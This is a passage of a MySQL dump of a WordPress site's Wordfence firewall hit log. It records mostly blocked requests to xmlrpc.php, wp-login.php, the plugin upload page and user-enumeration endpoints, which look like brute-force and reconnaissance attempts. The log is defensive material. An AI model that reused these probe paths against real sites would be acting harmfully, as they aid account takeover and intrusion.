LOCK TABLES `wp_wfhits` WRITE;
/*!40000 ALTER TABLE `wp_wfhits` DISABLE KEYS */;
INSERT INTO `wp_wfhits` VALUES (10781,0.000000,1630644442.599829,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10782,0.000000,1630644630.905929,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10783,1630644632.320736,1630644632.187600,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(10784,0.000000,1630647125.745465,'\0\0\0\0\0\0\0\0\0\0��6D �',0,200,0,0,0,'https://www.bournesociety.org.uk/?_wfsf=detectProxy','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1','scan:detectproxy',NULL,NULL),(10785,0.000000,1630647836.592176,'\0\0\0\0\0\0\0\0\0\0��tv0�',0,200,0,1,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36','loginFailValidUsername',NULL,NULL),(10786,0.000000,1630650042.242354,'\0\0\0\0\0\0\0\0\0\0���Dd@',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10787,0.000000,1630650861.085071,'\0\0\0\0\0\0\0\0\0\0��O�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10788,0.000000,1630652162.775672,'\0\0\0\0\0\0\0\0\0\0���6�C',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10789,1630652164.164122,1630652164.084200,'\0\0\0\0\0\0\0\0\0\0���6�C',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(10790,0.000000,1630654514.178557,'\0\0\0\0\0\0\0\0\0\0����n�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10791,0.000000,1630657764.646782,'\0\0\0\0\0\0\0\0\0\0��P��\Z',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10792,0.000000,1630658120.376874,'\0\0\0\0\0\0\0\0\0\0��Oe,',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10793,0.000000,1630658555.191419,'\0\0\0\0\0\0\0\0\0\0����{�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10794,0.000000,1630658975.881375,'\0\0\0\0\0\0\0\0\0\0����8\Z',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10795,0.000000,1630659034.160304,'\0\0\0\0\0\0\0\0\0\0��.�yo',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10796,0.000000,1630659381.548129,'\0\0\0\0\0\0\0\0\0\0����w�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10797,0.000000,1630659843.745193,'\0\0\0\0\0\0\0\0\0\0��4�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10798,0.000000,1630660285.281204,'\0\0\0\0\0\0\0\0\0\0���C�h',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10799,0.000000,1630660291.452231,'\0\0\0\0\0\0\0\0\0\0���6�C',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10800,1630660299.021834,1630660298.929300,'\0\0\0\0\0\0\0\0\0\0���6�C',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(10801,0.000000,1630660768.921954,'\0\0\0\0\0\0\0\0\0\0����8\Z',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10802,0.000000,1630661192.423307,'\0\0\0\0\0\0\0\0\0\0���6�',0,200,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10803,0.000000,1630661296.350846,'\0\0\0\0\0\0\0\0\0\0��\"P�R',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10804,0.000000,1630661680.897653,'\0\0\0\0\0\0\0\0\0\0�����1',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10805,0.000000,1630662122.152514,'\0\0\0\0\0\0\0\0\0\0���˰R',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10806,0.000000,1630662533.639726,'\0\0\0\0\0\0\0\0\0\0��ϴΥ',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10807,0.000000,1630662546.274568,'\0\0\0\0\0\0\0\0\0\0��x�@',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10808,0.000000,1630662639.125138,'\0\0\0\0\0\0\0\0\0\0���6�C',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10809,1630662640.506831,1630662640.416500,'\0\0\0\0\0\0\0\0\0\0���6�C',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(10810,0.000000,1630663013.870579,'\0\0\0\0\0\0\0\0\0\0����	g',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10811,0.000000,1630663452.393796,'\0\0\0\0\0\0\0\0\0\0���Gڿ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10812,0.000000,1630663791.253605,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10813,0.000000,1630663923.771300,'\0\0\0\0\0\0\0\0\0\0���7pm',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10814,0.000000,1630664382.120681,'\0\0\0\0\0\0\0\0\0\0��\\�6q',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10815,0.000000,1630664827.425464,'\0\0\0\0\0\0\0\0\0\0��|�\n',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10816,0.000000,1630665276.244549,'\0\0\0\0\0\0\0\0\0\0����r�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10817,0.000000,1630665880.217828,'\0\0\0\0\0\0\0\0\0\0��6\'1�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10818,0.000000,1630666328.285552,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10819,0.000000,1630666436.106683,'\0\0\0\0\0\0\0\0\0\0���7o\r',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10820,0.000000,1630666450.118350,'\0\0\0\0\0\0\0\0\0\0��э6�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','https://www.google.com/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10821,0.000000,1630666763.449914,'\0\0\0\0\0\0\0\0\0\0���Ҝ4',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10822,0.000000,1630667224.543526,'\0\0\0\0\0\0\0\0\0\0��/jɆ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10823,0.000000,1630667270.013161,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10824,1630667279.393797,1630667279.274700,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(10825,0.000000,1630667703.877325,'\0\0\0\0\0\0\0\0\0\0��-@6�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10826,0.000000,1630668142.211330,'\0\0\0\0\0\0\0\0\0\0��3��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10827,0.000000,1630668174.472722,'\0\0\0\0\0\0\0\0\0\0����R',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10828,1630668176.483488,1630668176.406300,'\0\0\0\0\0\0\0\0\0\0����R',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(10829,0.000000,1630668612.706161,'\0\0\0\0\0\0\0\0\0\0��gQW',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10830,0.000000,1630669008.283853,'\0\0\0\0\0\0\0\0\0\0��h���',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10831,0.000000,1630669089.726506,'\0\0\0\0\0\0\0\0\0\0��m�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10832,0.000000,1630669527.093281,'\0\0\0\0\0\0\0\0\0\0��3[{�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10833,0.000000,1630669917.784265,'\0\0\0\0\0\0\0\0\0\0����R',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10834,1630669919.176098,1630669919.098700,'\0\0\0\0\0\0\0\0\0\0����R',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(10835,0.000000,1630669980.092092,'\0\0\0\0\0\0\0\0\0\0��4�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10836,0.000000,1630670406.450484,'\0\0\0\0\0\0\0\0\0\0��D��',0,503,0,0,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10837,1630670409.962136,1630670409.740300,'\0\0\0\0\0\0\0\0\0\0��D��',0,503,0,0,0,'https://www.bournesociety.org.uk//xmlrpc.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"Ly94bWxycGMucGhw\"}'),(10838,1630670409.355931,1630670408.824800,'\0\0\0\0\0\0\0\0\0\0��D��',0,503,0,0,0,'https://www.bournesociety.org.uk//wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.bournesociety.org.uk%2F',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"Ly93cC1qc29uL29lbWJlZC8xLjAvZW1iZWQ=\"}'),(10839,1630670408.466345,1630670408.305200,'\0\0\0\0\0\0\0\0\0\0��D��',0,503,0,0,0,'https://www.bournesociety.org.uk//wp-json/wp/v2/users/',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"Ly93cC1qc29uL3dwL3YyL3VzZXJzLw==\"}'),(10840,1630670407.865523,1630670407.572400,'\0\0\0\0\0\0\0\0\0\0��D��',0,503,0,0,0,'https://www.bournesociety.org.uk//?author=3',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"Ly8=\"}'),(10841,0.000000,1630670420.767338,'\0\0\0\0\0\0\0\0\0\0��|��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10842,0.000000,1630670913.230798,'\0\0\0\0\0\0\0\0\0\0��3[{�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10843,0.000000,1630671366.470240,'\0\0\0\0\0\0\0\0\0\0��/jɆ',0,200,0,1,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(10844,0.000000,1630671530.959114,'\0\0\0\0\0\0\0\0\0\0���7o',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10845,0.000000,1630671847.352937,'\0\0\0\0\0\0\0\0\0\0��|�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10846,0.000000,1630672276.773545,'\0\0\0\0\0\0\0\0\0\0��g�\\X',0,503,0,0,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10847,1630672278.681088,1630672278.604500,'\0\0\0\0\0\0\0\0\0\0��g�\\X',0,503,0,0,0,'https://www.bournesociety.org.uk//wp-login.php','https://www.bournesociety.org.uk//wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"Ly93cC1sb2dpbi5waHA=\"}'),(10848,0.000000,1630672349.099293,'\0\0\0\0\0\0\0\0\0\0��h-)-',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10849,0.000000,1630672802.859274,'\0\0\0\0\0\0\0\0\0\0���.yB',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10850,0.000000,1630673244.329367,'\0\0\0\0\0\0\0\0\0\0��ν�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10851,0.000000,1630673738.098884,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10852,0.000000,1630674164.755900,'\0\0\0\0\0\0\0\0\0\0��/4�*',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10853,0.000000,1630674332.472847,'\0\0\0\0\0\0\0\0\0\0���]]{',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10854,0.000000,1630674535.998445,'\0\0\0\0\0\0\0\0\0\0����r',0,200,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10855,0.000000,1630674651.771991,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10856,0.000000,1630674852.780454,'\0\0\0\0\0\0\0\0\0\0���6�C',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10857,1630674854.387989,1630674854.305000,'\0\0\0\0\0\0\0\0\0\0���6�C',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(10858,0.000000,1630675082.870463,'\0\0\0\0\0\0\0\0\0\0��.ePS',0,200,0,1,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(10859,0.000000,1630675544.175971,'\0\0\0\0\0\0\0\0\0\0��o���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10860,0.000000,1630676020.632940,'\0\0\0\0\0\0\0\0\0\0��#ݵ�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10861,0.000000,1630676515.365345,'\0\0\0\0\0\0\0\0\0\0��o]8�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10862,0.000000,1630676942.996924,'\0\0\0\0\0\0\0\0\0\0���;N�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10863,0.000000,1630677440.766978,'\0\0\0\0\0\0\0\0\0\0��3[{�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10864,0.000000,1630677921.965334,'\0\0\0\0\0\0\0\0\0\0��[��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security 